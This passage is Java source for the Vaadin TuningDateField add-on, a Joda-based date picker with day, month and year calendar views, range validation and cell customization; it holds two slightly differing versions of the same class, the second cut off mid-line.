private int getCalendarFirstYear() { return yearDisplayed - yearDisplayed % 10 - 1; } /** * If current year displayed is 1954, the range is 1949-1960 */ private int getCalendarLastYear() { return yearDisplayed - yearDisplayed % 10 + 10; } private LocalDate getSelectedDate(int dayOfMonth) { return yearMonthDisplayed.toLocalDate(dayOfMonth); } private YearMonth getSelectedMonth(int monthOfYear) { return new YearMonth(yearDisplayed, monthOfYear); } /** * Called when the calendar is open on client-side */ private void onCalendarOpen() { calendarResolution = CalendarResolution.DAY; LocalDate currentValue = getLocalDate(); if (currentValue != null) { yearMonthDisplayed = new YearMonth(currentValue); } else { yearMonthDisplayed = YearMonth.now(); } calendarOpen = true; } /** * Called when user clicked on cell item * * @param relativeDateIndex * is dayOfMonth in day resolution, monthOfYear in month resolution, year in year resolution */ protected void onCalendarItemClicked(int relativeDateIndex) { if (calendarResolution.equals(CalendarResolution.DAY)) { if (isDateEnabled(getSelectedDate(relativeDateIndex))) { // We check the date is not disabled LocalDate selectedDate = getSelectedDate(relativeDateIndex); setConvertedValue(selectedDate); // Should now close the calendar calendarOpen = false; } } else if (calendarResolution.equals(CalendarResolution.MONTH)) { if (isMonthEnabled(getSelectedMonth(relativeDateIndex))) { YearMonth selectedMonth = getSelectedMonth(relativeDateIndex); setYearMonthDisplayed(selectedMonth); setCalendarResolution(CalendarResolution.DAY); fireEvent(new MonthChangeEvent(this, selectedMonth)); } } else if (calendarResolution.equals(CalendarResolution.YEAR)) { if(isYearEnabled(relativeDateIndex)) { setYearMonthDisplayed(new YearMonth(relativeDateIndex, getYearMonthDisplayed().getMonthOfYear())); setCalendarResolution(CalendarResolution.MONTH); } } } /** * Called when user clicked on the next page control */ public void goToNextCalendarPage() { if (calendarResolution.equals(CalendarResolution.DAY)) { setYearMonthDisplayed(yearMonthDisplayed.plusMonths(1)); fireEvent(new MonthChangeEvent(this, yearMonthDisplayed)); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setYearMonthDisplayed(yearMonthDisplayed.plusYears(1)); fireEvent(new YearChangeEvent(this, yearDisplayed)); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { setYearMonthDisplayed(yearMonthDisplayed.plusYears(10)); } } /** * Called when user clicked on the previous page control */ public void goToPreviousCalendarPage() { if (calendarResolution.equals(CalendarResolution.DAY)) { setYearMonthDisplayed(yearMonthDisplayed.minusMonths(1)); fireEvent(new MonthChangeEvent(this, yearMonthDisplayed)); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setYearMonthDisplayed(yearMonthDisplayed.minusYears(1)); fireEvent(new YearChangeEvent(this, yearDisplayed)); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { setYearMonthDisplayed(yearMonthDisplayed.minusYears(10)); } } /** * Called when user clicked on the resolution control */ public void swithToHigherCalendarResolution() { if (calendarResolution.equals(CalendarResolution.DAY)) { setCalendarResolution(CalendarResolution.MONTH); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setCalendarResolution(CalendarResolution.YEAR); } markAsDirty(); } /** * Returns true if month is enabled. Default implementations returns {@link CellItemCustomizer} value if any. * * @param yearMonth * the month * @return true if month is enabled. */ protected boolean isMonthEnabled(YearMonth yearMonth) { if (cellItemCustomizer != null) { return cellItemCustomizer.isEnabled(yearMonth, this); } return true; } /** * Returns true if year is enabled. Default implementations returns {@link CellItemCustomizer} value if any. * * @param year * the year * @return true if year is enabled. */ protected boolean isYearEnabled(int year) { if (cellItemCustomizer != null) { return cellItemCustomizer.isEnabled(year, this); } return true; } /** * Returns the week header names in the order of appearance in the calendar.<br /> * Ex for {@link Locale#FRANCE} : [lun., mar., mer., jeu., ven., sam., dim.] Ex for {@link Locale#US} : [Sun, Mon, * Tue, Wed, Thu, Fri, Sat] * * @param locale * the locale * @return the week header names in the order of appearance in the calendar. */ protected String[] getWeekDayNames(Locale locale) { String[] weekHeaderNames = new String[7]; String[] weekDays = DateFormatSymbols.getInstance(locale).getShortWeekdays(); int firstDayOfWeek = getFirstDayOfWeek(locale); for (int i = 0; i < 7; i++) { weekHeaderNames[i] = weekDays[(firstDayOfWeek + i) % 7 + 1]; } return weekHeaderNames; } /** * Gets the first day of the week, in the given locale. * * @param locale * the locale * @return a value in the range of {@link DateTimeConstants#MONDAY} to {@link DateTimeConstants#SUNDAY}. */ private final int getFirstDayOfWeek(Locale locale) { Calendar calendar; if (locale != null) { calendar = Calendar.getInstance(locale); } else { calendar = Calendar.getInstance(); } return ((calendar.getFirstDayOfWeek() + 5) % 7) + 1; } /** * Gets the last day of the week, in the given locale. * * @param locale * the locale * @return a value in the range of {@link DateTimeConstants#MONDAY} to {@link DateTimeConstants#SUNDAY}. */ private final int getLastDayOfWeek(Locale locale) { Calendar calendar; if (locale != null) { calendar = Calendar.getInstance(locale); } else { calendar = Calendar.getInstance(); } return ((calendar.getFirstDayOfWeek() + 4) % 7) + 1; } public static final Method DATE_CHANGE_METHOD = ReflectTools.findMethod(DateChangeListener.class, "dateChange", DateChangeEvent.class); public void addDateChangeListener(DateChangeListener listener) { addListener(DateChangeEvent.class, listener, DATE_CHANGE_METHOD); } public void removeDateChangeListener(DateChangeListener listener) { removeListener(DateChangeEvent.class, listener, DATE_CHANGE_METHOD); } public static final Method MONTH_CHANGE_METHOD = ReflectTools.findMethod(MonthChangeListener.class, "monthChange", MonthChangeEvent.class); public void addMonthChangeListener(MonthChangeListener listener) { addListener(MonthChangeEvent.class, listener, MONTH_CHANGE_METHOD); } public void removeMonthChangeListener(MonthChangeListener listener) { removeListener(MonthChangeEvent.class, listener, MONTH_CHANGE_METHOD); } public static final Method YEAR_CHANGE_METHOD = ReflectTools.findMethod(YearChangeListener.class, "yearChange", YearChangeEvent.class); public void addYearChangeListener(YearChangeListener listener) { addListener(YearChangeEvent.class, listener, YEAR_CHANGE_METHOD); } public void removeYearChangeListener(YearChangeListener listener) { removeListener(YearChangeEvent.class, listener, YEAR_CHANGE_METHOD); } @Override public Class<? extends String> getType() { return String.class; } /** * @return the monthDisplayed */ public YearMonth getYearMonthDisplayed() { return yearMonthDisplayed; } /** * @param yearMonthDisplayed * the yearMonthDisplayed to set */ public void setYearMonthDisplayed(YearMonth yearMonthDisplayed) { this.yearMonthDisplayed = yearMonthDisplayed; this.yearDisplayed = yearMonthDisplayed.getYear(); markAsDirty(); } /** * @return the yearDisplayed */ public Integer getYearDisplayed() { return yearDisplayed; } /** * @param yearDisplayed * the yearDisplayed to set */ public void setYearDisplayed(Integer yearDisplayed) { this.yearDisplayed = yearDisplayed; markAsDirty(); } /** * @return the dateTimeFormatter */ public DateTimeFormatter getDateTimeFormatter() { return dateTimeFormatter; } /** * @param dateTimeFormatter * the dateTimeFormatter to set */ public void setDateTimeFormatter(final DateTimeFormatter dateTimeFormatter) { this.dateTimeFormatter = dateTimeFormatter; defaultDateTimeFormatter = false; } /** * @return the weekendDisabled */ public boolean isWeekendDisabled() { return weekendDisabled; } /** * @param weekendDisabled * the weekendDisabled to set */ public void setWeekendDisabled(boolean weekendDisabled) { this.weekendDisabled = weekendDisabled; } /** * @return the calendarResolution */ public CalendarResolution getCalendarResolution() { return calendarResolution; } /** * @param calendarResolution * the calendarResolution to set */ public void setCalendarResolution(CalendarResolution calendarResolution) { this.calendarResolution = calendarResolution; } /** * @return the controlsEnabled */ public boolean isControlsEnabled() { return controlsEnabled; } /** * @param controlsEnabled * the controlsEnabled to set */ public void setControlsEnabled(boolean controlsEnabled) { this.controlsEnabled = controlsEnabled; } /** * @return the cellItemCustomizer */ public CellItemCustomizer getCellItemCustomizer() { return cellItemCustomizer; } /** * @param cellItemCustomizer * the cellItemCustomizer to set */ public void setCellItemCustomizer(CellItemCustomizer cellItemCustomizer) { this.cellItemCustomizer = cellItemCustomizer; } }
tuning-datefield/src/main/java/org/vaadin/addons/tuningdatefield/TuningDateField.java
/* * Copyright (C) 2013 Frederic Dreyfus * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.vaadin.addons.tuningdatefield; import java.lang.reflect.Method; import java.text.DateFormatSymbols; import java.util.Arrays; import java.util.Calendar; import java.util.Locale; import org.joda.time.DateTimeConstants; import org.joda.time.Days; import org.joda.time.LocalDate; import org.joda.time.Months; import org.joda.time.YearMonth; import org.joda.time.format.DateTimeFormat; import org.joda.time.format.DateTimeFormatter; import org.vaadin.addons.tuningdatefield.event.DateChangeEvent; import org.vaadin.addons.tuningdatefield.event.DateChangeListener; import org.vaadin.addons.tuningdatefield.event.MonthChangeEvent; import org.vaadin.addons.tuningdatefield.event.MonthChangeListener; import org.vaadin.addons.tuningdatefield.event.YearChangeEvent; import org.vaadin.addons.tuningdatefield.event.YearChangeListener; import org.vaadin.addons.tuningdatefield.widgetset.client.TuningDateFieldRpc; import org.vaadin.addons.tuningdatefield.widgetset.client.TuningDateFieldState; import org.vaadin.addons.tuningdatefield.widgetset.client.ui.calendar.CalendarItem; import org.vaadin.addons.tuningdatefield.widgetset.client.ui.calendar.CalendarResolution; import com.google.gwt.thirdparty.guava.common.base.Objects; import com.vaadin.data.Property; import com.vaadin.data.util.converter.Converter; import com.vaadin.data.util.converter.Converter.ConversionException; import com.vaadin.data.validator.RangeValidator; import com.vaadin.ui.AbstractField; import com.vaadin.ui.TextField; import com.vaadin.util.ReflectTools; /** * A date picker with a Joda {@link LocalDate} as model.<br /> * <p> * Usage:<br /> * * <pre> * TuningDateField tuningDateField = new TuningDateField(); * tuningDateField.setLocale(Locale.US); // optional * // A null range means no limit * tuningDateField.setDateRange(new LocalDate(2013, MAY, 10), new LocalDate(2013, JUNE, 5), &quot;The date must be between &quot; * + startDate + &quot; and &quot; + endDate); * tuningDateField.setLocalDate(new LocalDate(2013, MAY, 15)); * tuningDateField.setCellItemCustomizer(myTuningDateFieldCustomizer); // To customize cells of calendar * </pre> * * </p> * * <p> * The {@link TuningDateField} displays a {@link TextField} with proper LocalDate converter and a toggle button to * display a calendar.<br /> * The default converter will use a short format . You can set your own formatter using * {@link #setDateTimeFormatter(DateTimeFormatter)}. * </p> * <p> * To acess the {@link LocalDate} value of this field use the {@link #getLocalDate()} method which will return * <code>null</code> if the text value is null or if it is invalid. * </p> * * <p> * You can customize cells of the calendar using the {@link CellItemCustomizer} and its convenient default * {@link CellItemCustomizerAdapter}. <br /> * Example of a customizer which will apply even style to even days and odd styles for odd days in the calendar with * {@link CalendarResolution#DAY} resolution.<br /> * It will also disable the 25th of December 2013: * * <pre> * public class MyTuningDateFieldCustomizer extends TuningDateFieldCustomizerAdapter { * * &#064;Override * public String getStyle(LocalDate date, TuningDateField calendar) { * return date.getDayOfMonth() % 2 == 0 ? &quot;even&quot; : &quot;odd&quot;; * } * * &#064;Override * public boolean isEnabled(LocalDate date, TuningDateField calendar) { * if (date.equals(new LocalDate(2013, DECEMBER, 25))) { * return false; * } else { * return true; * } * } * } * </pre> * * </p> * * <p> * The primary stylename of the calendar is </code>tuning-datefield-calendar</code><br /> * <br /> * * CSS styles for calendar {@link CalendarResolution#DAY} : * <ul> * <li>today : if cell represents the current day</li> * <li>selected : if cell represents the selected day</li> * <li>currentmonth : if cell represents a day on current calendar month</li> * <li>previousmonth : if cell represents a day on previous calendar month</li> * <li>nextmonth : if cell represents a day on next calendar month</li> * <li>weekend : if cell represents a week-end</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * CSS styles for calendar {@link CalendarResolution#MONTH} : * <ul> * <li>selected : if cell represents the selected month</li> * <li>currentmonth : if cell represents a day on current calendar month</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * CSS styles for calendar {@link CalendarResolution#YEAR} : * <ul> * <li>selected : if cell represents the selected month</li> * <li>currentyear : if cell represents a day on current calendar month</li> * <li>enabled : if cell is enabled</li> * <li>disabled : if cell is disabled</li> * </ul> * * </p> * * * @author Frederic.Dreyfus * */ public class TuningDateField extends AbstractField<String> { private static final long serialVersionUID = 5261965803349750329L; /** * The cell item customizer which allows to customize calendar cells. */ private CellItemCustomizer cellItemCustomizer; /** * The date range validator if a range is defined * * @see #setDateRange(LocalDate, LocalDate, String) */ private RangeValidator<LocalDate> dateRangeValidator; // private boolean dayPicker = true; private CalendarResolution calendarResolution = CalendarResolution.DAY; /** * A dateTimeFormatter for parsing/printing dates. A default {@link DateTimeFormatter} is defined with short format * for current locale. This can be overriden using {@link #setDateTimeFormatter(DateTimeFormatter)} */ private DateTimeFormatter dateTimeFormatter; // True if the dateTimeFormatter is the default one and not a user defined private boolean defaultDateTimeFormatter = true; // Internal uses : the following 4 values are computed once at init and if the locale changes. private String[] monthTexts; // Jan, Feb, Mar private String[] shortMonthTexts; // Jan, Feb, Mar private String[] weekDayNames; // Sun, Mon, Tue, ... private int firstDayOfWeek; // 1 in France (monday), 7 in the US (sunday) private int lastDayOfWeek; // 7 in France (sunday), 6 in the US (saturday) /** * True to disable weekends. * * @see #setWeekendDisabled(boolean) */ private boolean weekendDisabled = true; /** * True to enable/disabled controls * * @see #setControlsEnabled(boolean) */ private boolean controlsEnabled = true; // Internal use : the month currently displayed in the calendar private YearMonth yearMonthDisplayed; // Internal use : the year currently displayed in the calendar private int yearDisplayed; // Internal use private boolean calendarOpen; public TuningDateField() { init(); setValue(null); } public TuningDateField(String caption) { this(); setCaption(caption); init(); } public TuningDateField(Property<?> dataSource) { this(null, dataSource); } public TuningDateField(String caption, Property<?> dataSource) { init(); setCaption(caption); setPropertyDataSource(dataSource); } public TuningDateField(String caption, LocalDate value) { init(); setCaption(caption); setLocalDate(value); } private void init() { setupLocaleBasedStaticData(getLocale()); initConverter(); setYearMonthDisplayed(YearMonth.now()); registerTuningDateFieldRpc(); addValueChangeListener(new ValueChangeListener() { private static final long serialVersionUID = -8632906562585439165L; @Override public void valueChange(com.vaadin.data.Property.ValueChangeEvent event) { fireEvent(new DateChangeEvent(TuningDateField.this, (LocalDate) getConvertedValue())); } }); } /** * Initialize the {@link LocalDate} converter for the text field. */ private void initConverter() { Converter<String, LocalDate> converter = new Converter<String, LocalDate>() { private static final long serialVersionUID = -2161506497954814519L; @Override public LocalDate convertToModel(String value, Class<? extends LocalDate> targetType, Locale locale) throws com.vaadin.data.util.converter.Converter.ConversionException { if (value == null) { return null; } LocalDate modelValue = null; try { modelValue = dateTimeFormatter.parseLocalDate(value); } catch (IllegalArgumentException e) { throw new ConversionException("Cannot convert to model"); } return modelValue; } @Override public String convertToPresentation(LocalDate value, Class<? extends String> targetType, Locale locale) throws com.vaadin.data.util.converter.Converter.ConversionException { if (value == null) { return null; } String presentationValue = null; try { presentationValue = dateTimeFormatter.print(value); } catch (IllegalArgumentException e) { throw new ConversionException("Cannot convert to presentation"); } return presentationValue; } @Override public Class<LocalDate> getModelType() { return LocalDate.class; } @Override public Class<String> getPresentationType() { return String.class; } }; setConverter(converter); } private void registerTuningDateFieldRpc() { registerRpc(new TuningDateFieldRpc() { private static final long serialVersionUID = 3572898507878457932L; @Override public void onCalendarOpen() { TuningDateField.this.onCalendarOpen(); markAsDirty(); } @Override public void onCalendarClosed() { calendarOpen = false; markAsDirty(); } @Override public void calendarItemClicked(Integer relativeDateIndex) { onCalendarItemClicked(relativeDateIndex); } @Override public void dateTextChanged(String dateText) { setValue(dateText); } @Override public void previousControlClicked() { if (controlsEnabled) { goToPreviousCalendarPage(); } else { // wtf ? should never happen } } @Override public void nextControlClicked() { if (controlsEnabled) { goToNextCalendarPage(); } else { // wtf ? should never happen } } @Override public void resolutionControlClicked() { if (controlsEnabled) { swithToHigherCalendarResolution(); } else { // wtf ? should never happen } } }); } public void setLocale(Locale locale) { super.setLocale(locale); // reinitialize static data based on locale (monthText, day names, etc...) boolean localeModified = Objects.equal(getLocale(), locale); if (localeModified) { setupLocaleBasedStaticData(locale); } } private void setupLocaleBasedStaticData(Locale locale) { if (locale == null) { locale = Locale.getDefault(); } if (defaultDateTimeFormatter) { dateTimeFormatter = DateTimeFormat.shortDate().withLocale(locale); } monthTexts = new DateFormatSymbols(locale).getMonths(); shortMonthTexts = new DateFormatSymbols(locale).getShortMonths(); firstDayOfWeek = getFirstDayOfWeek(locale); lastDayOfWeek = getLastDayOfWeek(locale); weekDayNames = getWeekDayNames(locale); } /** * Sets the date range of this tuningDateField * * @param startDate * the start date (included) * @param endDate * the end date (included) */ public void setDateRange(LocalDate startDate, LocalDate endDate, String errorMessage) { if (endDate.isBefore(startDate)) { throw new IllegalArgumentException("Cannot have a date range with end date " + endDate + " before start date " + startDate); } // set validator for date range if (dateRangeValidator != null) { removeValidator(dateRangeValidator); } dateRangeValidator = new RangeValidator<LocalDate>(errorMessage, LocalDate.class, startDate, endDate); addValidator(dateRangeValidator); markAsDirty(); } /** * Returns <code>true</code> if : * <ol> * <li>date is in range</li> * <li>date is not a week-end, or if it is then week-ends are not disabled</li> * <li>date is not disabled by {@link CellItemCustomizer}</li> * </ol> * * @param date * the date * @return <code>true</code> if date is enabled, else returns <code>false</code> */ protected boolean isDateEnabled(LocalDate date) { boolean enabled = false; enabled = isDateInRange(date); if (!enabled) { return enabled; } if (isWeekend(date) && isWeekendDisabled()) { return false; } if (enabled && cellItemCustomizer != null) { enabled = cellItemCustomizer.isEnabled(date, this); } return enabled; } /** * Returns <code>true</code> if date is in range, else returns <code>false</code> * * @param date * the date. * @return <code>true</code> if date is in range, else returns <code>false</code> */ private boolean isDateInRange(LocalDate date) { if (dateRangeValidator == null) { return true; } else { return dateRangeValidator.isValid(date); } } /** * <code>true</code> if date is a week-end, else returns <code>false</code>. <br /> * Override this method for custom week-ends days. * * @param date * the date * @return <code>true</code> if date is a week-end, else returns <code>false</code> */ protected boolean isWeekend(LocalDate date) { return date.getDayOfWeek() >= DateTimeConstants.SATURDAY; } @Override public TuningDateFieldState getState() { return (TuningDateFieldState) super.getState(); } @Override public void beforeClientResponse(boolean initial) { super.beforeClientResponse(initial); // For days of first week that are in previous month // Get first day of week of last week's previous month if (getValue() != null) { getState().setDisplayedDateText(getValue()); } getState().setCalendarOpen(calendarOpen); // We send calendar state only if it's open if (calendarOpen) { getState().setControlsEnabled(controlsEnabled); getState().setCalendarResolution(calendarResolution); if (calendarResolution.equals(CalendarResolution.DAY)) { YearMonth yearMonthDisplayed = getYearMonthDisplayed(); String displayedMonthText = monthTexts[yearMonthDisplayed.getMonthOfYear() - 1]; getState().setCalendarResolutionText(displayedMonthText + " " + yearMonthDisplayed.getYear()); getState().setWeekHeaderNames(weekDayNames); getState().setCalendarItems(buildDayItems()); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { getState().setCalendarItems(buildMonthItems()); getState().setCalendarResolutionText(Integer.toString(yearMonthDisplayed.getYear())); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { getState().setCalendarItems(buildYearItems()); getState().setCalendarResolutionText(getCalendarFirstYear() + " - " + getCalendarLastYear()); } } } private CalendarItem[] buildDayItems() { LocalDate calendarFirstDay = getCalendarFirstDay(); LocalDate calendarLastDay = getCalendarLastDay(); LocalDate firstDayOfMonth = yearMonthDisplayed.toLocalDate(1); LocalDate lastDayOfMonth = yearMonthDisplayed.toLocalDate(1).dayOfMonth().withMaximumValue(); LocalDate today = LocalDate.now(); int numberOfDays = Days.daysBetween(calendarFirstDay, calendarLastDay).getDays() + 1; LocalDate date = calendarFirstDay; CalendarItem[] calendarItems = new CalendarItem[numberOfDays]; LocalDate currentValue = getLocalDate(); for (int i = 0; i < numberOfDays; i++, date = date.plusDays(1)) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(date.getDayOfMonth()); calendarItems[i].setText(Integer.toString(date.getDayOfMonth())); StringBuilder style = new StringBuilder(); if (date.equals(today)) { style.append("today "); } if (currentValue != null && date.equals(currentValue)) { style.append("selected "); } if (date.isBefore(firstDayOfMonth)) { style.append("previousmonth "); calendarItems[i].setEnabled(false); } else if (date.isAfter(lastDayOfMonth)) { style.append("nextmonth "); calendarItems[i].setEnabled(false); } else { style.append("currentmonth "); calendarItems[i].setEnabled(true); } if (isWeekend(date)) { style.append("weekend "); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(date, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(date, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } if (isDateEnabled(date)) { calendarItems[i].setEnabled(true); } else { calendarItems[i].setEnabled(false); } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } } return calendarItems; } private CalendarItem[] buildMonthItems() { YearMonth calendarFirstMonth = getCalendarFirstMonth(); YearMonth calendarLastMonth = getCalendarLastMonth(); YearMonth currentMonth = YearMonth.now(); int numberOfMonths = Months.monthsBetween(calendarFirstMonth, calendarLastMonth).getMonths() + 1; CalendarItem[] calendarItems = new CalendarItem[numberOfMonths]; YearMonth month = calendarFirstMonth; LocalDate currentValue = getLocalDate(); YearMonth currentYearMonthValue = currentValue == null ? null : new YearMonth(currentValue.getYear(), currentValue.getMonthOfYear()); for (int i = 0; i < numberOfMonths; i++, month = month.plusMonths(1)) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(month.getMonthOfYear()); calendarItems[i].setEnabled(true); // By default StringBuilder style = new StringBuilder(""); if (month.equals(currentMonth)) { style.append("currentmonth "); } if (currentYearMonthValue != null && month.equals(currentYearMonthValue)) { style.append("selected "); } if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(month, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(month, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } if (isMonthEnabled(month)) { calendarItems[i].setEnabled(true); } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } calendarItems[i].setText(shortMonthTexts[i]); } return calendarItems; } private CalendarItem[] buildYearItems() { int calendarFirstYear = getCalendarFirstYear(); int calendarLastYear = getCalendarLastYear(); int currentYear = YearMonth.now().getYear(); int numberOfYears = calendarLastYear - calendarFirstYear + 1; CalendarItem[] calendarItems = new CalendarItem[numberOfYears]; int year = calendarFirstYear; LocalDate currentValue = getLocalDate(); Integer currentYearValue = currentValue == null ? null : currentValue.getYear(); for (int i = 0; i < numberOfYears; i++, year++) { calendarItems[i] = new CalendarItem(); calendarItems[i].setIndex(i); calendarItems[i].setRelativeDateIndex(year); calendarItems[i].setEnabled(true); StringBuilder style = new StringBuilder(""); if (year == currentYear) { style.append("currentyear "); } if (currentYearValue != null && year == currentYearValue) { style.append("selected "); } // FIXME missing isYearEnabled if (cellItemCustomizer != null) { String generatedStyle = cellItemCustomizer.getStyle(year, this); if (generatedStyle != null) { style.append(generatedStyle); style.append(" "); } String tooltip = cellItemCustomizer.getTooltip(year, this); if (tooltip != null) { calendarItems[i].setTooltip(tooltip); } } String computedStyle = style.toString(); if (!computedStyle.isEmpty()) { calendarItems[i].setStyle(computedStyle); } calendarItems[i].setText(Integer.toString(year)); } return calendarItems; } /** * Sets the localDate value of this field. * * @param localDate * the localDate */ public void setLocalDate(LocalDate localDate) { setConvertedValue(localDate); } /** * As the value of the field is a String, the representation may be corrupted to be parsed into a {@link LocalDate}. * In that case we return <code>null</code>. * * @return the localDate value of this field if defined and valid, else returns <code>null</code>. */ public LocalDate getLocalDate() { try { return (LocalDate) getConvertedValue(); } catch (ConversionException e) { // In that case the value is invalid return null; } } /** * @return the first day of the calendar. As there are 7 columns displayed, if the first day of month is not in the * first column, we fill previous column items with days of previous month. */ private LocalDate getCalendarFirstDay() { LocalDate firstDayOfMonth = yearMonthDisplayed.toLocalDate(1); int calendarFirstDayOfWeek = firstDayOfWeek; int numberOfDaysSinceFirstDayOfWeek = (firstDayOfMonth.getDayOfWeek() - calendarFirstDayOfWeek + 7) % 7; return firstDayOfMonth.minusDays(numberOfDaysSinceFirstDayOfWeek); } /** * @return the last day of the calendar. As there are 7 columns displayed, if the last day of month is not in the * last column, we fill next column items with days of next month. */ private LocalDate getCalendarLastDay() { LocalDate lastDayOfMonth = yearMonthDisplayed.toLocalDate(1).dayOfMonth().withMaximumValue(); int calendarLastDayOfWeek = lastDayOfWeek; int numberOfDaysUntilLastDayOfWeek = (calendarLastDayOfWeek - lastDayOfMonth.getDayOfWeek() + 7) % 7; return lastDayOfMonth.plusDays(numberOfDaysUntilLastDayOfWeek); } private YearMonth getCalendarFirstMonth() { return new YearMonth(yearDisplayed, 1); } private YearMonth getCalendarLastMonth() { return new YearMonth(yearDisplayed, 12); } /** * If current year displayed is 1954, the range is 1949-1960 */ private int getCalendarFirstYear() { return yearDisplayed - yearDisplayed % 10 - 1; } /** * If current year displayed is 1954, the range is 1949-1960 */ private int getCalendarLastYear() { return yearDisplayed - yearDisplayed % 10 + 10; } private LocalDate getSelectedDate(int dayOfMonth) { return yearMonthDisplayed.toLocalDate(dayOfMonth); } private YearMonth getSelectedMonth(int monthOfYear) { return new YearMonth(yearDisplayed, monthOfYear); } /** * Called when the calendar is open on client-side */ private void onCalendarOpen() { calendarResolution = CalendarResolution.DAY; LocalDate currentValue = getLocalDate(); if (currentValue != null) { yearMonthDisplayed = new YearMonth(currentValue); } else { yearMonthDisplayed = YearMonth.now(); } calendarOpen = true; } /** * Called when user clicked on cell item * * @param relativeDateIndex * is dayOfMonth in day resolution, monthOfYear in month resolution, year in year resolution */ protected void onCalendarItemClicked(int relativeDateIndex) { if (calendarResolution.equals(CalendarResolution.DAY)) { if (isDateEnabled(getSelectedDate(relativeDateIndex))) { // We check the date is not disabled LocalDate selectedDate = getSelectedDate(relativeDateIndex); setConvertedValue(selectedDate); // Should now close the calendar calendarOpen = false; } } else if (calendarResolution.equals(CalendarResolution.MONTH)) { if (isMonthEnabled(getSelectedMonth(relativeDateIndex))) { YearMonth selectedMonth = getSelectedMonth(relativeDateIndex); setYearMonthDisplayed(selectedMonth); setCalendarResolution(CalendarResolution.DAY); fireEvent(new MonthChangeEvent(this, selectedMonth)); } } else if (calendarResolution.equals(CalendarResolution.YEAR)) { // FIXME : isYearEnabled setYearMonthDisplayed(new YearMonth(relativeDateIndex, getYearMonthDisplayed().getMonthOfYear())); setCalendarResolution(CalendarResolution.MONTH); } } /** * Called when user clicked on the next page control */ public void goToNextCalendarPage() { if (calendarResolution.equals(CalendarResolution.DAY)) { setYearMonthDisplayed(yearMonthDisplayed.plusMonths(1)); fireEvent(new MonthChangeEvent(this, yearMonthDisplayed)); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setYearMonthDisplayed(yearMonthDisplayed.plusYears(1)); fireEvent(new YearChangeEvent(this, yearDisplayed)); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { setYearMonthDisplayed(yearMonthDisplayed.plusYears(10)); } } /** * Called when user clicked on the previous page control */ public void goToPreviousCalendarPage() { if (calendarResolution.equals(CalendarResolution.DAY)) { setYearMonthDisplayed(yearMonthDisplayed.minusMonths(1)); fireEvent(new MonthChangeEvent(this, yearMonthDisplayed)); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setYearMonthDisplayed(yearMonthDisplayed.minusYears(1)); fireEvent(new YearChangeEvent(this, yearDisplayed)); } else if (calendarResolution.equals(CalendarResolution.YEAR)) { setYearMonthDisplayed(yearMonthDisplayed.minusYears(10)); } } /** * Called when user clicked on the resolution control */ public void swithToHigherCalendarResolution() { if (calendarResolution.equals(CalendarResolution.DAY)) { setCalendarResolution(CalendarResolution.MONTH); } else if (calendarResolution.equals(CalendarResolution.MONTH)) { setCalendarResolution(CalendarResolution.YEAR); } markAsDirty(); } /** * Returns true if month is enabled. Default implementations returns monthCustomizer value if any. * * @param yearMonth * @return true if month is enabled. */ protected boolean isMonthEnabled(YearMonth yearMonth) { if (cellItemCustomizer != null) { return cellItemCustomizer.isEnabled(yearMonth, this); } return true; } /** * Returns the week header names in the order of appearance in the calendar.<br /> * Ex for {@link Locale#FRANCE} : [lun., mar., mer., jeu., ven., sam., dim.] Ex for {@link Locale#US} : [Sun, Mon, * Tue, Wed, Thu, Fri, Sat] * * @param locale * the locale * @return the week header names in the order of appearance in the calendar. */ protected String[] getWeekDayNames(Locale locale) { String[] weekHeaderNames = new String[7]; String[] weekDays = DateFormatSymbols.getInstance(locale).getShortWeekdays(); int firstDayOfWeek = getFirstDayOfWeek(locale); for (int i = 0; i < 7; i++) { weekHeaderNames[i] = weekDays[(firstDayOfWeek + i) % 7 + 1]; } return weekHeaderNames; } /** * Gets the first day of the week, in the given locale. * * @param locale * the locale * @return a value in the range of {@link DateTimeConstants#MONDAY} to {@link DateTimeConstants#SUNDAY}. */ private final int getFirstDayOfWeek(Locale locale) { Calendar calendar; if (locale != null) { calendar = Calendar.getInstance(locale); } else { calendar = Calendar.getInstance(); } return ((calendar.getFirstDayOfWeek() + 5) % 7) + 1; } /** * Gets the last day of the week, in the given locale. * * @param locale * the locale * @return a value in the range of {@link DateTimeConstants#MONDAY} to {@link DateTimeConstants#SUNDAY}. */ private final int getLastDayOfWeek(Locale locale) { Calendar calendar; if (locale != null) { calendar = Calendar.getInstance(locale); } else { calendar = Calendar.getInstance(); } return ((calendar.getFirstDayOfWeek() + 4) % 7) + 1; } public static final Method DATE_CHANGE_METHOD = ReflectTools.findMethod(DateChangeListener.class, "dateChange", DateChangeEvent.class); public void addDateChangeListener(DateChangeListener listener) { addListener(DateChangeEvent.class, listener, 